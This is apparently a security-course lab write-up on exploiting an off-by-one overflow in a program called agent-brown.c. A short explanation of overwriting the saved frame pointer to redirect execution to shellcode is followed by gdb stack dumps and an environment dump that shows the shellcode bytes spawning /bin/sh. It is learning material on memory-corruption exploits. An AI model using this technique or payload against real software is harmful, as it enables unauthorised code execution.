The code agent-brown.c has a buffer of size 64 but the for loop will iterate 65 times and write into the buffer. We can exploit the fact that an extra byte is written to iverwrite the ebp address and cause it to jump to the beginning of buf. We place the address of the egg variable inside buf so our shellcode will be run. We also pad the buffer with 60 characters so we can go past the buffer and overwrite the ebp.

Breakpoint 1, invoke (
    in=0xbffffd4f "\272\337\337\237", 'A' <repeats 60 times>, "\024")
    at agent-brown.c:19
19        flip(buf, in);
(gdb) x/32x $esp
0xbffffb30:     0x00000000      0x00000000      0x00000000      0xb7ff3fdc
0xbffffb40:     0xbffffbf4      0x00000000      0x00000000      0xb7e5f043
0xbffffb50:     0x0804820e      0xbffffc54      0xbffffd37      0xb7ec3d1b
0xbffffb60:     0xbffffd37      0x0000002f      0xbffffbbc      0xb7fd2000
0xbffffb70:     0x080484b0      0x080482f0      0xbffffb88      0x0804841d
0xbffffb80:     0xbffffd4f      0xbffffb88      0xbffffba8      0x0804845c
0xbffffb90:     0xbffffd4f      0x0804965c      0xbffffbb8      0xbffffbc0
0xbffffba0:     0xb7fed270      0xbffffbc0      0x00000000      0xb7e454d3


(gdb) continue
Continuing.

Breakpoint 2, invoke (
    in=0xbffffd4f "\272\337\337\237", 'A' <repeats 60 times>, "\024")
    at agent-brown.c:20
20        puts(buf);
(gdb) x/32x $esp
0xbffffb30:     0xbffffb38      0xbffffd4f      0xbfffff9a      0x61616161
0xbffffb40:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb50:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb60:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffb70:     0x61616161      0x61616161      0xbffffb34      0x0804841d
0xbffffb80:     0xbffffd4f      0xbffffb88      0xbffffba8      0x0804845c
0xbffffb90:     0xbffffd4f      0x0804965c      0xbffffbb8      0xbffffbc0
0xbffffba0:     0xb7fed270      0xbffffbc0      0x00000000      0xb7e454d3

x/1000x *((char **)environ)

0xbfffff11:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff21:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff31:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff41:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff51:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff61:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff71:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff81:     0xffffffff      0xffffffff      0xffffffff      0xffffffff
0xbfffff91:     0xffffffff      0x67676520      0x5e1feb3d      0x31087689
0xbfffffa1:     0x074688c0      0xb00c4689      0x8df3890b      0x568d084e
0xbfffffb1:     0x3180cd0c      0x40d889db      0xdce880cd      0x2fffffff
0xbfffffc1:     0x2f6e6962      0x54006873      0x3d4d5245      0x65726373